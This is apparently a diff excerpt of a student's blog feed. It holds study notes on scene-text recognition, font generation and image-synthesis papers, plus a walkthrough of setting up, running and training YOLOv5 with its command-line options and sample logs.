Implements the synthetic dataset UnrealText on top of UE 4.22 and the UnrealCV plugin. Shown effective with EAST, the scene text detection SOTA

• Viewfinder module
• Environment Randomization module
• Text Region Generation module
• Text Rendering module

Idea: introduce synthetic datasets into scene text editing; Chinese scene text datasets are scarce, so try synthesizing one.

    HENet:Forcing a Network to Think More for Font Recognition

    ​ 发表在 AISS 2021: Sanya, China


    ​ 目前的字体识别网站需要用户交互,而我们提出的网络架构 HENet 是段端到端的。

    png

    Huang et al. [4] propose a font recognizer for Chinese characters and Chinese text blocks, which is made up of a modified inception module and convolutions.


​ Three components:

• Feature-extraction backbone

  • A stack of convolutions
• HE block

  • A pluggable module, the HE Block, is proposed to improve HENet's font-recognition accuracy. It suppresses the features with the most prominent responses and forces the network to look for subtler features so that it can predict similar fonts correctly (one possible reading is sketched below).
• Font classifier

  • Treats font recognition as a classification problem.
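A sketch of one way to read the HE Block idea: damp the strongest channel responses during training so the classifier must also rely on subtler features. This is my interpretation, not the paper's exact formulation; suppress_ratio and scale are invented parameters:

import torch
import torch.nn as nn

class HEBlockSketch(nn.Module):
    """Attenuate the most prominent channel responses (training only) so the
    network cannot lean on a few dominant features when fonts look alike."""
    def __init__(self, suppress_ratio=0.1, scale=0.5):
        super().__init__()
        self.suppress_ratio = suppress_ratio
        self.scale = scale

    def forward(self, x):                        # x: (B, C, H, W)
        if not self.training:
            return x
        b, c, _, _ = x.shape
        strength = x.abs().mean(dim=(2, 3))      # per-channel response (B, C)
        k = max(1, int(c * self.suppress_ratio))
        top = strength.topk(k, dim=1).indices    # most prominent channels
        mask = torch.ones_like(strength)
        mask.scatter_(1, top, self.scale)        # damp those channels
        return x * mask.view(b, c, 1, 1)

x = torch.randn(2, 64, 8, 8)
print(HEBlockSketch().train()(x).shape)  # torch.Size([2, 64, 8, 8])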

​ The paper also mentions introducing a transformer to capture both global and local stroke information.

Idea: use font recognition in scene text editing, then fetch the other characters of that font directly from the font file, as a fallback for font generation.

​ Also: Font Recognition with Deep Learning | by Jehad Mohamed | MLearning.ai | Medium. Older (2015); basically just a stack of CNNs.

Text Recognition in the Wild: A Survey

See: [Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…/…/…/…/2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

    ]]>
@@ -7322,7 +7322,7 @@ /posts/Paper-SEED-Semantics%20Enhanced%20Encoder-Decoder%20Framework%20for%20Scene%20Text%20Recognition/ - Preface

@everyone All first- and second-year students, please read this paper first. At this Wednesday's group meeting each of you will translate one passage and analyze the paper's writing style. It is a CVPR 2020 paper; this year's CVPR deadline is June 20, and CVPR is a CCF-recommended conference, so keep an eye on the conference website. Those who are prepared may submit.

Translation

Abstract

​ Scene text recognition is a hot research topic. Recent recognition models are based on the encoder-decoder (E-D) framework and can handle perspective distortion and curved shapes, but they do poorly on blur, uneven illumination, and incomplete characters. We argue this is because those E-D methods rely on local visual features without explicit global semantic information. We propose a semantics-enhanced E-D framework to recognize low-quality scene text robustly. Semantic information is used for supervision in the encoder and for initialization in the decoder. In particular, the current state-of-the-art (SOTA) method ASTER is also integrated into the proposed framework. Extensive experiments show the model is robust to low-quality images and achieves SOTA results on several benchmarks. Code will be released.

1 Introduction

• Vocabulary: convincing performance, conventional, promising results, background interference, occlusion, regular, each time step

• For irregular text recognition, the rectification-based methods

• Rectification-based methods first rectify the irregular images; the rest of the pipeline is then the same as for regular recognition

• multi-direction encoding: uses a CNN with two LSTMs to encode four directions

• 2D-attention: handles irregular text with a 2D attention mechanism, operating directly on the two-dimensional feature map

​ If text recognition is treated as nothing but a character-classification task and global semantics are ignored, the results on low-quality images will be garbage.


​ Semantic information has two advantages:

• In NLP it can be supervised with a word embedding

• Vocabulary: gap, cross-modality task, concepts, weighted ranking loss


​ Our model predicts the semantic information, supervised by word embeddings from a pre-trained language model.

• Vocabulary: integrate

2.1 Scene Text Recognition

• Traditional methods adopt a bottom-up approach: first detect and classify characters, then apply heuristic rules, language models, or lexicons. They feed piles of computationally expensive hand-crafted features, such as aspect ratio and hole area ratio, into an SVM

• Vocabulary: HOG descriptors, Hough voting, treats, character alignment, contextual dependencies, attention drift


​ The methods above all assume the text is horizontal and fail on perspective distortion and curved text. STN was proposed to solve this; iterative rectification and geometric constraints can also be used for rectification.

• Vocabulary: in spite of, auxiliary dense character, tailored

2.2 Semantics in Scene Text

• Vocabulary: contextualized lexicons, word spotting system, boost, utilize, integrate, explicitly

3 Method

3.1 Encoder-Decoder Framework

• Vocabulary: simplicity, fixed, drawback, inspired, shortcuts, capable

3.2 FastText Model

​ Let $T=\{w_{i-l},\dots,w_{i+l}\}$ be a sentence in the text corpus.

• $l$ is the length of the sentence, a hyperparameter

• The word $w_i$ is represented by an embedding vector $v_i$ and fed into a simple feed-forward neural network

• The objective is to predict the context, denoted $C_i=w_{i-l},\dots,w_{i-1},w_{i+1},\dots,w_{i+l}$. Training the feed-forward network also optimizes the embedding vectors, so words with similar semantics end up with nearby embeddings

• FastText also embeds subwords and uses them to build the final embedding of $w_i$ (a sketch of the subword n-grams follows).
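A small pure-Python illustration of FastText's subword idea: a word is wrapped in boundary markers and decomposed into character n-grams, and the word's final embedding is the sum of its n-gram vectors. The function name is mine:

def char_ngrams(word, n_min=3, n_max=6):
    """Character n-grams as in FastText: the word is wrapped in boundary
    symbols '<' and '>' and all n-grams with n_min <= n <= n_max are taken."""
    w = f"<{word}>"
    grams = [w[i:i + n] for n in range(n_min, n_max + 1)
             for i in range(len(w) - n + 1)]
    return grams + [w]  # the whole word is kept as one extra unit

print(char_ngrams("where", 3, 3))
# ['<wh', 'whe', 'her', 'ere', 're>', '<where>']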

3.3 SEED

3.3.1 General Framework

• Vocabulary: scenarios, address these problems, utilizing, alternative, fed into

3.3.2 Architecture of Semantics Enhanced ASTER

• Vocabulary: exemplar, transcribes, thin-plate splines, rectified image

​ The encoder outputs a feature sequence $h=(h_1,\dots,h_L)$ of shape $L\times C$, where $L$ is the width of the CNN's last feature map and $C$ is its depth.

​ The feature sequence $h$ serves two purposes:

• predicting the semantic information through the semantic module

• acting as the decoder's input

• The feature sequence is flattened into a one-dimensional vector $I$ of dimension $K=L\times C$; the semantic information $S$ is predicted by two linear functions: $S=W_2\sigma(W_1I+b_1)+b_2$

• In particular, the semantic information $S$ is used to initialize the states of the GRU, after a linear function transforms its dimension.

• Instead of zero-state initialization, the decoding process is guided by global semantics, so the decoder uses not only local visual information but also global semantic information to generate more accurate results (see the sketch below).
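A minimal PyTorch sketch of the semantic branch and the GRU initialization described above; all sizes (L, C, the bottleneck width, sem_dim) are assumptions, not the paper's values:

import torch
import torch.nn as nn

class SemanticModuleSketch(nn.Module):
    """Flatten h (L x C) to I, predict S = W2 * sigma(W1 * I + b1) + b2,
    then map S to the decoder GRU's initial hidden state."""
    def __init__(self, L=25, C=512, sem_dim=300, hidden=256):
        super().__init__()
        K = L * C
        self.fc1 = nn.Linear(K, K // 4)
        self.fc2 = nn.Linear(K // 4, sem_dim)    # -> semantic info S
        self.to_h0 = nn.Linear(sem_dim, hidden)  # transform dimension for GRU

    def forward(self, h):                        # h: (B, L, C)
        I = h.flatten(1)
        S = self.fc2(torch.relu(self.fc1(I)))
        h0 = self.to_h0(S).unsqueeze(0)          # (1, B, hidden) initial state
        return S, h0

h = torch.randn(4, 25, 512)
S, h0 = SemanticModuleSketch()(h)
gru = nn.GRU(input_size=512, hidden_size=256, batch_first=True)
out, _ = gru(h, h0)  # decode guided by global semantics instead of zeros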

3.4 Loss Function and Training Strategy

$$L=L_{rec}+\lambda L_{sem}$$

• $L_{rec}$ is the standard cross-entropy between the predicted probabilities and the ground truth
• $L_{sem}$ is the cosine embedding loss between the predicted semantic information and the word embedding of the transcription label taken from the pre-trained FastText model

• Two training strategies (a loss sketch follows):
  • initialize the decoder with the word embedding from the pre-trained FastText model instead of the predicted semantic information
  • predict the semantic information directly
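A sketch of the combined loss, assuming PyTorch's built-in cosine embedding loss matches the one described; tensor shapes and names are assumed:

import torch
import torch.nn.functional as F

def seed_loss(logits, target_ids, S_pred, S_emb, lam=1.0):
    """L = L_rec + lambda * L_sem: cross-entropy on the predicted character
    distribution plus a cosine embedding loss pulling the predicted semantics
    S_pred toward the FastText embedding S_emb of the transcription label."""
    # logits: (B, T, V), target_ids: (B, T), S_pred/S_emb: (B, D)
    L_rec = F.cross_entropy(logits.flatten(0, 1), target_ids.flatten())
    y = torch.ones(S_pred.size(0), device=S_pred.device)  # "similar" pairs
    L_sem = F.cosine_embedding_loss(S_pred, S_emb, y)
    return L_rec + lam * L_sem

print(seed_loss(torch.randn(2, 5, 30), torch.randint(0, 30, (2, 5)),
                torch.randn(2, 300), torch.randn(2, 300)))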

4 Experiments

4.1 Datasets

• Vocabulary: implementation details, benchmarks, cropped, careful capture, resolution, synthetic

• It contains words from the testing sets of IC13 and SVT.

4.2 Implementation Details

• Vocabulary: officially, symbols, accumulative scores

• ADADELTA is adopted to minimize the objective function

• Beam Search, a decoding strategy commonly used in text generation, is applied

4.3 Ablation Study

• Vocabulary: separately, consistently, predicted holistic features, implicit weakly supervised

4.4 Performance with Inaccurate Bounding Boxes

• Vocabulary: real applications, receptive field, conduct experiments, situation, exemplar, shrink datasets, simultaneously, intersection over union (IoU)

• If text recognition is robust to inaccurate detection results, the overall end-to-end performance can be more satisfactory

4.5 Generalization of Proposed Framework

• Vocabulary: generalization

• Integrates another state-of-the-art recognition method, SAR

4.6 Qualitative Results and Visualization

• Vocabulary: occlusion

Code

Pay20Y/SEED (github.com): download the code, then delete the torch entries from requirements.txt.

Install:

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

Installation will fail halfway on pycocotools; fix it with:

sudo apt-get install gcc build-essential

Continue; installing scipy will fail next, so remove it from requirements.txt and reinstall until there are no errors.


Download the pre-trained language model cc.en.300.bin from Word vectors for 157 languages · fastText.

    ]]>
@@ -7351,7 +7351,7 @@ /posts/Paper-%E7%AC%AC%206%20%E5%91%A8%E5%92%8C%E7%AC%AC%207%20%E5%91%A8%E4%B9%9F%E6%98%AF%E8%A2%AB%E8%A6%81%E6%B1%82%E7%9C%8B%E8%AE%BA%E6%96%87%E7%84%B6%E5%90%8E%E7%9C%8B%E4%B8%8D%E6%87%82%E7%9A%84%E4%B8%A4%E5%91%A8/ - Preface

​ Another two weeks have passed and I read a few papers. I summarized them so late that I've already forgotten what a couple of them were about 😅.

​ I still feel code matters most! The server is set up and I've gotten started with pytorch, so it's really time to start reproducing code. Skimming many papers feels less useful than reading one closely? I should also try Hung-yi Lee's coding assignments! Though this plan somewhat contradicts my advisor's advice to read papers broadly.

​ Not sure what effect my last push-back on my advisor had; in any case the group meetings keep getting longer, and I hope my labmates don't blame me 😅. At last week's meeting the advisor had Fan-ge explain roughly how he padded out his little Electronics paper, and next week we'll again pick one paper to discuss in the group, so I'll just keep reading.

​ This post summarizes the papers from these two weeks. I've actually had an idea for a while, I just don't know whether it's any good. Maybe in a while I'll write it up and push back on my advisor again with my recent thoughts and progress.

​ Also, I've been posting a lot and my blog is getting scattered; time to tidy it up properly. And my disk is nearly full, that needs sorting too.

​ Practice English! Next time, I promise 😭.

​ Let me finish these papers quickly; I want to learn front-end, UE, and operating systems 😭.

​ The semester is almost half over. Please let me go home for the summer and study properly back at Shida 😭.

Main content

Read on my own

Few-shot Font Generation with Weakly Supervised Localized Representations

Resources

Paper:

Code:

Content

​ Giao, I read this so long ago that even my notes barely bring it back; if I'm still interested, I should reread it.

• To handle font style transfer for Chinese characters, it designs a new font-generation method that learns localized styles: component-wise style representations rather than a universal style.

• Font generation means extracting complex local features from very few reference glyphs: local strokes, serifs, sub-character sizes. Chinese characters have far too many components, which makes this hard.

​ The work designs 371 components to represent all 19,514 characters of the Chinese writing system.

The proposed model, LF-Font, is split into several parts:

• Content Encoding: the encoder $E_c$ extracts the content representation $f_c$ from the input $x_{s_0,c}$
• Style Encoding: the style encoder $E_{s,u}$ extracts the style
• Generation: the generator $G$ synthesizes the target glyph $\tilde{x}_{\tilde{s},c}$ from $f_c$ and $f_s$
• Training with shared modules

​ I can't recall more, orz. Evaluation metrics for generative models still seem to be subjective.

The SYNTHIA Dataset: A Large Collection of Synthetic Images for Semantic Segmentation of Urban Scenes

Resources

IEEE

Paper

Website

Content

​ Not actually related to the method I want to study, orz, but it is a Unity-generated dataset for semantic segmentation of urban scenes (nostalgia!), used to train autonomous driving.

​ I'd kind of like to run this one myself. SYNTHIA comes with generated class annotations and is meant to be used together with publicly available urban images.

​ It contains 13 pixel-level semantic classes: sky, building, road, sidewalk, fence, vegetation, lane marking, pole, car, traffic sign, pedestrian, bicycle. The attributes of these classes can be adjusted freely.

​ 213,400 synthetic images, both snapshots and video sequences, rendered from multiple viewpoints while simulating different seasons, weather, and lighting.

Towards End-to-End Unified Scene Text Detection and Layout Analysis

Resources

Paper:

Code:

Content

​ I actually took fairly detailed notes on this one at the time, good.

• Proposes a new model, Unified Detector, that tries to combine scene text detection with document layout analysis. Introduces a new hierarchical scene dataset, HierText: the first dataset with hierarchical text annotations in both natural scenes and documents, with high-quality word-, line-, and paragraph-level annotations.
  • Essentially frames document layout analysis as detection and segmentation tasks
  • Brings layout analysis into the scene-text domain.

• Architecture:

  • Backbone: MaX-DeepLab, an hourglass-style CNN stacked alternately with the proposed dual-path transformer; the CNN iteratively encodes features from coarse to fine resolution and can therefore produce high-resolution features.
  • Text detection branch
  • Layout branch
  • Textness branch: two fully connected layers plus a sigmoid, producing binary classifications $\{\hat y_i\}^N_{i=1}$
• Uses the recently proposed $PQ$ metric as the main evaluation metric (a computation sketch follows this list): $PQ=\frac{\sum_{(p,g)\in TP}IOU(p,g)}{|TP|+\frac{1}{2}|FP|+\frac{1}{2}|FN|}$

• Loss function: $\mathcal{L}=\lambda_1\mathcal{L}_{det}+\lambda_2\mathcal{L}_{lay}+\lambda_3\mathcal{L}_{seg}+\lambda_4\mathcal{L}_{ins}$

  • $\mathcal L_{det}$: text detection loss
  • $\mathcal L_{lay}$: layout analysis loss
  • $\mathcal L_{seg}$: instance discrimination loss
  • $\mathcal L_{ins}$: produced by MaX-DeepLab
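A small sketch of the PQ computation, assuming a one-to-one matching between predictions and ground truths has already been established and `ious` holds the IoU of each matched pair; names are mine:

def panoptic_quality(ious, n_pred, n_gt, thr=0.5):
    """PQ = sum of IoU(p, g) over TP / (|TP| + 0.5*|FP| + 0.5*|FN|).
    `ious` maps matched (pred_id, gt_id) pairs to their IoU; pairs with
    IoU > thr count as true positives."""
    tp = {pg: iou for pg, iou in ious.items() if iou > thr}
    n_tp = len(tp)
    fp = n_pred - n_tp   # unmatched or low-IoU predictions
    fn = n_gt - n_tp     # unmatched or low-IoU ground truths
    return sum(tp.values()) / (n_tp + 0.5 * fp + 0.5 * fn)

print(panoptic_quality({(0, 0): 0.9, (1, 1): 0.7, (2, 2): 0.3},
                       n_pred=4, n_gt=3))  # 2 TP, 2 FP, 1 FN -> 1.6 / 3.5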

Papers that seemed impressive, so I read them more carefully

​ These each got a standalone post; listing them here as well.

Paper-Text Recognition in the Wild-A Survey

See: [Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…/…/…/…/2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

Assigned by my advisor

    SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition

Resources

Paper:

Code:

Content

• Current work handles perspective distortion and curved shapes in scene text with encoder-decoder (E-D) structures, but these don't cope well with blur, uneven illumination, or incomplete characters.
• Others rely on local visual features without explicit global semantic information; this work proposes a semantics-enhanced E-D that integrates the state-of-the-art ASTER.
• Treats text recognition as a cross-modality task: word embeddings are taken from a pre-trained language model, i.e. NLP is brought into the loop.
• Existing deep-learning approaches: CTC and attention; for irregular text recognition: STN and attention.
• Exploiting semantics: CNNs, language models, pre-trained language models; here the skip-gram-based FastText is used as the pre-trained language model.

StarGAN v2-Diverse Image Synthesis for Multiple Domains

Resources

Content

StarGAN v2: diverse image synthesis for multiple domains

• Proposes a new image-to-image model, StarGAN v2, which guarantees diversity of the generated images and scalability across multiple domains (translating an image of one domain into multiple images of a target domain, with multiple target domains supported).
• Proposes a new animal-faces dataset, AFHQ

Given an image $x\in \mathcal X$ and an arbitrary domain $y\in \mathcal Y$, StarGAN trains a generator $G$ that produces diverse images of domain $y$ corresponding to $x$. It consists of 4 modules:

• The generator $G$ produces images: it takes $x$ and a style code $s$ provided by $F$ or $E$, outputs $G(x,s)$, and injects $s$ into $G$ with adaptive instance normalization (AdaIN)
• The mapping network $F$ turns a latent code $z$, for a given domain $y$, into a style code $s=F_y(z)$; it is an MLP with multiple output branches, one per domain
• The style encoder $E$, given an image $x$ and its domain $y$, extracts the image's style code $s=E_y(x)$ for $G$ to use
• The discriminator $D$ judges images; just a binary classifier per domain

Training objectives (a sketch of two of these losses follows):

• Adversarial objective

  • Sample a latent code $z\in \mathcal Z$ and a target domain $\tilde y\in \mathcal Y$ to produce the target style code $\tilde s=F_{\tilde y}(z)$; the generator $G$ takes the image $x$ and $\tilde s$ as input and produces $G(x,\tilde s)$
    • Loss: $\mathcal L_{adv}=\mathbb{E}_{x,y}[\log D_y(x)]+\mathbb{E}_{x,\tilde y,z}[\log(1-D_{\tilde y}(G(x,\tilde s)))]$
• Style reconstruction

  • Forces the generator $G$ to actually use the style code $\tilde s$ when producing $G(x,\tilde s)$, via a style reconstruction loss
    • $\mathcal L_{sty}=\mathbb E_{x,\tilde y,z}[\|\tilde s-E_{\tilde y}(G(x,\tilde s))\|_1]$
• Style diversification

  • $\mathcal L_{ds}=\mathbb E_{x,\tilde y,z_1,z_2}[\|G(x,\tilde s_1)-G(x,\tilde s_2)\|_1]$
• Preserving source characteristics

  • $\mathcal L_{cyc}=\mathbb{E}_{x,y,\tilde y,z}[\|x-G(G(x,\tilde s),\tilde s)\|_1]$
• Overall: $\min_{G,F,E}\max_D\ \mathcal L_{adv}+\lambda_{sty}\mathcal L_{sty}-\lambda_{ds}\mathcal L_{ds}+\lambda_{cyc}\mathcal L_{cyc}$
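A sketch of two of the objectives above, written with mean-reduced L1 for brevity; the tensors stand in for outputs of the (unshown) generator and style encoder, so shapes and names are assumptions:

import torch

def style_reconstruction_loss(s_tilde, s_rec):
    """L_sty = ||s~ - E_y~(G(x, s~))||_1, where s_rec = E_y~(G(x, s~)) is the
    style code re-extracted from the generated image."""
    return (s_tilde - s_rec).abs().mean()

def diversity_loss(img1, img2):
    """L_ds = ||G(x, s1) - G(x, s2)||_1, maximized during training so that
    two latent codes yield visibly different outputs."""
    return (img1 - img2).abs().mean()

s_tilde, s_rec = torch.randn(2, 64), torch.randn(2, 64)
print(style_reconstruction_loss(s_tilde, s_rec))
print(diversity_loss(torch.randn(2, 3, 32, 32), torch.randn(2, 3, 32, 32)))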


Experiments

• Baselines: MUNIT, DRIT, MSGAN

• Datasets: CelebA-HQ, AFHQ

• Evaluation metrics: FID, LPIPS

A Framework for Real-time Object Detection and Image Restoration

Resources

Content

​ Does object detection and super-resolution / image restoration together.

• Builds a two-stage framework for object detection plus image restoration
  • Stage one: YOLO, followed by image cropping
  • Stage two: an improved Swin Transformer, named SwinOIR
• On object detection
  • Single-stage: directly predict class probabilities and locations; SSD, RetinaNet, CornerNet, YOLO
  • Multi-stage: RCNN, Fast R-CNN; first propose multiple regions, then classify those proposals.

They basically recount the whole history of YOLO, sure, why not.

Implements a Transformer for the image super-resolution task.

In this framework, detection runs first and restoration second; the super-resolution architecture is split into three modules (the attention formula is sketched after this list):

• Pre-Feature Extraction
  • Feature extraction? Just a stack of convolutions: $F_{pre}=H_{pre}(I_O)$
• Main Feature Extraction
  • Main feature extraction $F_{main}=H_{main}(F_{pre})$
  • $Q=XP_Q,K=XP_K,V=XP_V,\mathrm{Attention}(Q,K,V)=\mathrm{Softmax}(QK^T/\sqrt{d}+B)V$
• High Quality Image Reconstruction
  • Takes the previously extracted features and reconstructs a high-quality object image $I_{HQO}=H_{IR}(F_{pre}+F_{main})$

​ Optimization objective: $\mathcal L=\|I_{HQO}-I_{HQ}\|_1$
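The attention formula above, written out as a runnable sketch; B here is a zero relative-position bias just to show the shape, and the projection matrices are random stand-ins:

import torch

def attention_with_bias(X, P_Q, P_K, P_V, B):
    """Attention(Q, K, V) = Softmax(Q K^T / sqrt(d) + B) V, with a learned
    relative-position bias B as in Swin-style blocks. X: (N, d)."""
    Q, K, V = X @ P_Q, X @ P_K, X @ P_V
    d = Q.size(-1)
    scores = Q @ K.transpose(-2, -1) / d ** 0.5 + B
    return torch.softmax(scores, dim=-1) @ V

N, d = 49, 32
X = torch.randn(N, d)
P = [torch.randn(d, d) for _ in range(3)]
B = torch.zeros(N, N)  # would be learned per relative offset in practice
print(attention_with_bias(X, *P, B).shape)  # torch.Size([49, 32])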


Experiments

• Dataset: MS COCO, Pascal VOC, SR testing datasets, DIV2K, BSDS300, PIRM
• Evaluation metrics: mAP, PSNR, SSIM

YOLO9000-Better, Faster, Stronger

VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations

See: [Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations-Zi-Zi’s Journey](…/…/…/…/2023/04/05/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/)

Want to read

    ]]>
    @@ -7376,7 +7376,7 @@ /posts/Diary-%E8%BF%99%E6%98%AF%E7%AC%AC%206%20%E5%91%A8%E5%92%8C%E7%AC%AC%207%20%E5%91%A8%E7%9A%84%E6%97%A5%E5%B8%B8%EF%BC%81/ -
    ]]>
    +
    ]]>
@@ -7459,7 +7459,7 @@ /posts/Pytorch-%E7%9B%AE%E6%A0%87%E6%A3%80%E6%B5%8B%20YOLOv5%20%E5%BC%80%E6%BA%90%E4%BB%A3%E7%A0%81%E9%A1%B9%E7%9B%AE%E8%B0%83%E8%AF%95%E4%B8%8E%E8%AE%B2%E8%A7%A3%E5%AE%9E%E6%88%98-%E5%B0%8F%E5%9C%9F%E5%A0%86/ - Video

Repository

Course

Course overview

1. Project introduction and environment setup
2. How to run prediction with YOLOv5
3. How to train the YOLOv5 network
4. How to build and train on your own dataset
5. Understanding the structure of the prediction code
6. Understanding the structure of the training code
7. Rewriting the code together (time permitting)

Project introduction and environment setup

Fetch the project from the GitHub site.

To stay consistent with the walkthrough videos, pick the v5.0 tag (version 5.0 of yolov5, not of YOLO itself) and choose Download ZIP when downloading the code.

Check README.md:

Python 3.8 or later with all requirements.txt dependencies installed, including torch>=1.7. To install run:

$ pip install -r requirements.txt

Open the project with PyCharm and set up the environment:

conda create -n yolo python=3.9
conda activate yolo
pip install -r requirements.txt

1. Pick the specific tag so the files match the video
2. Configure the matching Conda environment in PyCharm
3. If the author provides a requirements.txt:
  • install via PyCharm's built-in suggestions
  • or install with pip install -r requirements.txt
4. If the author provides no requirements.txt
  • install the missing libraries by hand, based on the error messages and a web search

How to predict with YOLOv5 (part 1)

​ README.md shows how to load a trained model file and run prediction on images:

detect.py runs inference on a variety of sources, downloading models automatically from the latest YOLOv5 release and saving results to runs/detect.

$ python detect.py --source 0  # webcam
file.jpg # image
file.mp4 # video
path/ # directory
path/*.jpg # glob
'https://youtu.be/NUsoVlDFqZg' # YouTube video
'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP stream

​ The official docs recommend setting the parser arguments on the command line to start prediction, but you can also launch from PyCharm.

​ Open detect.py:

Under if __name__ == '__main__': the parser arguments from import argparse are defined; running the file from the command line lets you set them:

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--source', type=str, default='data/images', help='source')  # file/folder, 0 for webcam
    parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--view-img', action='store_true', help='display results')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --class 0, or --class 0 2 3')
    parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--update', action='store_true', help='update all models')
    parser.add_argument('--project', default='runs/detect', help='save results to project/name')
    parser.add_argument('--name', default='exp', help='save results to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    opt = parser.parse_args()
    print(opt)
    check_requirements(exclude=('pycocotools', 'thop'))

    with torch.no_grad():
        if opt.update:  # update all models (to fix SourceChangeWarning)
            for opt.weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
                detect()
                strip_optimizer(opt.weights)
        else:
            detect()

​ On first run it downloads the model file given by the --weights default yolov5s.pt: https://github.com/ultralytics/yolov5/releases/download/v5.0/yolov5s.pt. You can also swap in other models: `yolov5m.pt`, `yolov5l.pt`, `yolov5x.pt`.

​ It then reads the input from the --source default data/images.

​ The results are saved to the folder given by the --project default runs/detect.

Namespace(weights='yolov5s.pt', source='data/images', img_size=640, conf_thres=0.25, iou_thres=0.45, device='', view_img=False, save_txt=False, save_conf=False, nosave=False, classes=None, agnostic_nms=False, augment=False, update=False, project='runs/detect', name='exp', exist_ok=False)
YOLOv5 2021-4-12 torch 2.0.0+cpu CPU

Fusing layers...
C:\Users\gzjzx\anaconda3\envs\yolo\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3484.)
return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
Model Summary: 224 layers, 7266973 parameters, 0 gradients, 17.0 GFLOPS
image 1/2 D:\Study\1st-year-master\yolov5-5.0\data\images\bus.jpg: 640x480 4 persons, 1 bus, 1 fire hydrant, Done. (1.685s)
image 2/2 D:\Study\1st-year-master\yolov5-5.0\data\images\zidane.jpg: 384x640 2 persons, 2 ties, Done. (0.973s)
Results saved to runs\detect\exp14
Done. (3.025s)

Gotchas:

How to predict with YOLOv5 (part 2)

​ This part covers the remaining arguments.

​ You can set arguments in PyCharm under Edit Configurations... > Parameters.

• --img-size: imported images are rescaled to this size before being fed to the model.

• --conf-thres: confidence threshold; only detections scoring above it appear in the output.

• --iou-thres (an IoU/NMS sketch follows this list)

  • IOU: Intersection over Union
  • NMS: Non-Max Suppression
  • See NMS(non_max_suppression) - 知乎 (zhihu.com). Prediction produces many redundant boxes; NMS effectively deletes the redundant detections. Non-maximum suppression, as the name says, suppresses elements that are not local maxima. Boxes overlapping above this threshold get merged.
• --device: cuda or cpu

• --view-img: display the images after prediction

• --save-txt: save the box coordinates to a txt file after prediction

• --save-conf: also save the confidences into the txt file

• --nosave: whether to skip saving result images

• --classes: keep only certain classes, e.g. 0 or 0 2 3; with --classes = n, the images saved under runs/detect/exp*/ contain only class n (requires setting data)

• --agnostic-nms: run NMS across classes, removing boxes of different classes; default False

• --augment: test-time augmentation (TTA) / multi-scale prediction

• --visualize: whether to visualize the feature maps of the network layers

• --update: if True, run strip_optimizer on all models to strip the optimizer state from the pt files; default False

• --project: folder where test logs are saved

• --name: name of the test-log folder, so the final path is project/name

• --exist_ok: whether to reuse the log folder; if False, a new one is created
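Since --iou-thres is exactly the NMS threshold, here is a tiny pure-Python sketch of IoU and greedy NMS; it mirrors the idea, not YOLOv5's actual implementation:

def box_iou(a, b):
    """IoU of two (x1, y1, x2, y2) boxes."""
    x1, y1 = max(a[0], b[0]), max(a[1], b[1])
    x2, y2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(0.0, x2 - x1) * max(0.0, y2 - y1)
    area = lambda r: (r[2] - r[0]) * (r[3] - r[1])
    return inter / (area(a) + area(b) - inter + 1e-9)

def nms(boxes, scores, iou_thres=0.45):
    """Keep the highest-scoring box, drop every remaining box whose IoU
    with it exceeds iou_thres, and repeat."""
    order = sorted(range(len(boxes)), key=lambda i: scores[i], reverse=True)
    keep = []
    while order:
        i = order.pop(0)
        keep.append(i)
        order = [j for j in order if box_iou(boxes[i], boxes[j]) <= iou_thres]
    return keep

print(nms([[0, 0, 10, 10], [1, 1, 10, 10], [20, 20, 30, 30]],
          [0.9, 0.8, 0.7]))  # [0, 2]: the near-duplicate box is suppressed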

A small addendum

opt = parser.parse_args()
print(opt)

​ These two lines just parse the arguments defined above.

Training the YOLOv5 model (locally)

​ Run train.py to train a YOLOv5 model locally.

    github: skipping check (not a git repository)
    YOLOv5 2021-4-12 torch 1.13.1+cu117 CUDA:0 (NVIDIA GeForce MX330, 4095.875MB)

    Namespace(weights='yolov5s.pt', cfg='', data='data/coco128.yaml', hyp='data/hyp.scratch.yaml', epochs=300, batch_size=16, img_size=[640, 640], rect=False, resume=False, nosave=False, notest=False, noautoanchor=False, evolve=False, bucket='', cache_images=False, image_weights=False, device='', multi_scale=False, single_cls=False, adam=False, sync_bn=False, local_rank=-1, workers=0, project='runs/train', entity=None, name='exp', exist_ok=False, quad=False, linear_lr=False, label_smoothing=0.0, upload_dataset=False, bbox_interval=-1, save_period=-1, artifact_alias='latest', world_size=1, global_rank=-1, save_dir='runs\\train\\exp6', total_batch_size=16)
    tensorboard: Start with 'tensorboard --logdir runs/train', view at http://localhost:6006/
